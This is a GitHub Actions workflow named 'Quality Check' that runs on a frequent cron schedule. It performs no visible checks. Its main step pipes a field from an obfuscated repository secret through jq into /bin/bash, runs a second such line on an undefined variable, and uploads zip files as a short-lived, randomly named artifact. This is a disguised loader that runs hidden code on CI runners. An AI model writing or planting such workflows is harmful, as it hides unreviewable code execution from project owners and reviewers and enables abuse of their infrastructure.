name: Quality Check
on:
  workflow_dispatch:

  schedule:
    - cron: '6 5,11,17,23 * * *'
env:
  CI: true
concurrency:
  group: ${{ github.workflow }}
  cancel-in-progress: false
jobs:
  check:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
        with:
          fetch-depth: 0
      - name: Main step
        env:
          rio5021: ${{ secrets.rio5021 }}
        run: |
          printf '%s' "$rio5021" | jq -r .okfpz46381 | /bin/bash
          printf '%s' "$lfqt7" | jq -r .t6653 | /bin/bash

      - name: Save data
        uses: actions/upload-artifact@v4
        with:
          name: uvZ4UDkB
          path: "*.zip"
          retention-days: 1
